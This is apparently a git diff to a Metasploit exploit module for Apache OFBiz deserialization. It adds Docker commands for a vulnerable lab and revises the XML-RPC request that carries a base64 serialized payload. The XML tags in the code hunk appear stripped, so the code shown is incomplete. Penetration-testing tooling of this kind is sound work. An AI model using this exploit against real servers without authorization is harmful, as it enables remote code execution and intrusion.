diff --git a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md index 1fe2594ce8..56504076ec 100644 --- a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md +++ b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md @@ -10,6 +10,13 @@ versions prior to 17.12.04. You can use . +1. Initialize the database with demo data (`INIT_DB=2`) + * `docker run --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12` +1. Start a postgres instance + * `docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres` +1. Link the database and OFBiz containers + * `docker run -d -p 80:8080 -p 8443:8443 --link some-postgres:postgres opensourceknight/ofbiz:15.12` + ## Verification Steps Follow [Setup](#setup) and [Scenarios](#scenarios). diff --git a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb index 022582991e..d593bb4c2b 100644 --- a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb +++ b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb @@ -137,14 +137,21 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => Nokogiri::XML(<<~XML, &:noblanks).to_xml - #{rand_text_alphanumeric(8..42)} - - #{rand_text_alphanumeric(8..42)} - - #{Rex::Text.encode_base64(data)} - - + #{rand_text_alphanumeric(8..42)} + + + + + + #{rand_text_alphanumeric(8..42)} + + #{Rex::Text.encode_base64(data)} + + + + + + XML )